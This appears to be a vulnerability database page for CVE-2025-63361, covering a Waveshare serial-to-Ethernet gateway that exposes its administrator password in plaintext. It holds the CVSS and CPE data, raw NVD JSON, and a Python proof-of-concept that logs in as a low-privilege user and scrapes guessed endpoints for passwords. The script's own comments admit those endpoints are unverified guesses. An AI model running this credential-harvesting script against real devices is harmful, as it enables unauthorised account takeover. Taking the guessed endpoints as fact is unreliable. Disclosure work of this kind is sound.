Security Vulnerability Report
CVE-2025-63361 CVSS 5.7 MEDIUM

CVE-2025-63361

Published: 2025-12-04 19:16:05
Last Modified: 2025-12-15 15:35:07

Description

Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 was discovered to render the Administrator password in plaintext.

CVSS Details

CVSS Score
5.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:waveshare:rs232\/485_to_wifi_eth_\(b\)_firmware:3.1.1.0:*:*:*:*:*:*:* - VULNERABLE
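cpe:2.3:h:waveshare:rs232\/485_to_wifi_eth_\(b\):4.3.2.1:*:*:*:*:*:*:* - NOT VULNERABLE (platform entry: in the raw JSON below, this hardware CPE is AND-ed with the firmware CPE, so it names the hardware the affected firmware runs on rather than a fixed or safe version)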
Waveshare RS232/485 TO WIFI ETH (B) Gateway Firmware V3.1.1.0
Hardware Version HW 4.3.2.1
Webpage Version V7.04T.07.002880.0301

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
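import re

import requests

# CVE-2025-63361 PoC - Waveshare Gateway Admin Password Disclosure
# Target: Waveshare RS232/485 TO WIFI ETH (B) Gateway
# Firmware: V3.1.1.0, HW: 4.3.2.1, Webpage: V7.04T.07.002880.0301
#
# NOTE(review): the advisory text on this page says only that the web page
# renders the Administrator password in plaintext (CWE-522). The login path,
# the form field names and the endpoint list below are guesses made by this
# script and are not confirmed by the advisory. A negative result therefore
# does not show that a device is unaffected.
# NOTE(review): the published CVSS vector lists UI:R. This script models no
# user interaction, so it may not follow the exposure path that was reported.

TARGET_IP = "192.168.1.100"  # Target device IP
USERNAME = "low_priv_user"  # Low privilege user
PASSWORD = "user_password"

# Seconds to wait on each HTTP call. Without a timeout, requests blocks
# forever when the device stops answering.
_REQUEST_TIMEOUT = 10

# Common endpoints that may expose admin credentials (unverified guesses).
_CANDIDATE_ENDPOINTS = (
    "/admin/user_config",
    "/system/user_management",
    "/cgi-bin/admin/user_list",
    "/api/v1/users",
    "/cgi-bin/get_admin_info",
)

# Compiled once instead of on every endpoint iteration. Each pattern has one
# capture group, so findall() yields plain strings.
# NOTE(review): these match any password-like field, including the logged-in
# user's own password. A hit shows that a credential is rendered in the
# response, not that it belongs to the Administrator account.
_PASSWORD_PATTERNS = tuple(
    re.compile(pattern, re.IGNORECASE)
    for pattern in (
        r'password["\']?\s*[:=]\s*["\']([^"\'\s]+)["\']',
        r'admin_password["\']?\s*[:=]\s*["\']([^"\'\s]+)["\']',
        r'pwd["\']?\s*[:=]\s*["\']([^"\'\s]+)["\']',
        r'value=["\']([^"\'\s]{6,32})["\'][^>]*type=["\']password["\']',
    )
)


def exploit_admin_password_disclosure():
    """Check whether the gateway's web UI returns a password in plaintext.

    Logs in as the low-privilege account in USERNAME/PASSWORD and fetches
    each candidate endpoint. It returns the first password-like value found
    in a response body.

    Returns:
        The matched string, or None when login fails, a request errors out,
        or no candidate endpoint yields a match.
    """
    # The PoC talks plain HTTP, so the test credentials cross the network
    # unencrypted.
    base_url = f"http://{TARGET_IP}"

    # Step 1: Login with low privilege account.
    # The context manager closes the session's connection pool on every exit
    # path. The original never closed it.
    with requests.Session() as session:
        login_data = {"username": USERNAME, "password": PASSWORD}
        try:
            response = session.post(
                f"{base_url}/login", data=login_data, timeout=_REQUEST_TIMEOUT
            )
        except requests.RequestException as exc:
            print(f"[-] Login request failed: {exc}")
            return None

        # NOTE(review): HTTP 200 is the only success signal checked here. A
        # UI that answers 200 with an error page would pass this test.
        if response.status_code != 200:
            print("[-] Login failed")
            return None
        print("[+] Logged in with low privilege account")

        # Step 2: Look for a plaintext password in the candidate pages.
        for endpoint in _CANDIDATE_ENDPOINTS:
            try:
                response = session.get(
                    f"{base_url}{endpoint}", timeout=_REQUEST_TIMEOUT
                )
            except requests.RequestException as exc:
                print(f"[-] Request to {endpoint} failed: {exc}")
                continue

            for pattern in _PASSWORD_PATTERNS:
                matches = pattern.findall(response.text)
                if matches:
                    admin_password = matches[0]
                    # The value is a live credential. Report that it was
                    # exposed without copying it to the terminal or to logs.
                    # The caller still receives it as the return value.
                    print(
                        f"[+] Found admin password at {endpoint}: "
                        f"<redacted, {len(admin_password)} chars>"
                    )
                    return admin_password

    print("[-] Admin password not found in common endpoints")
    return None


if __name__ == "__main__":
    print("CVE-2025-63361 PoC - Waveshare Gateway Password Disclosure")
    print("=" * 60)
    exploit_admin_password_disclosure()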

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63361", "sourceIdentifier": "[email protected]", "published": "2025-12-04T19:16:04.757", "lastModified": "2025-12-15T15:35:06.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 was discovered to render the Administrator password in plaintext."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:waveshare:rs232\\/485_to_wifi_eth_\\(b\\)_firmware:3.1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F7FD270F-5998-4F41-A80E-8017DF6A142B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:waveshare:rs232\\/485_to_wifi_eth_\\(b\\):4.3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "F085A075-48AC-42E4-9BA6-DBB9A8B2935B"}]}]}], "references": [{"url": "https://drive.google.com/file/d/1AGv9KWMTB71NJfIOncuNO6FyK0UAqxmL/view?usp=sharing", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://otsecverse.github.io/OTSecVerse/posts/Post-1/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}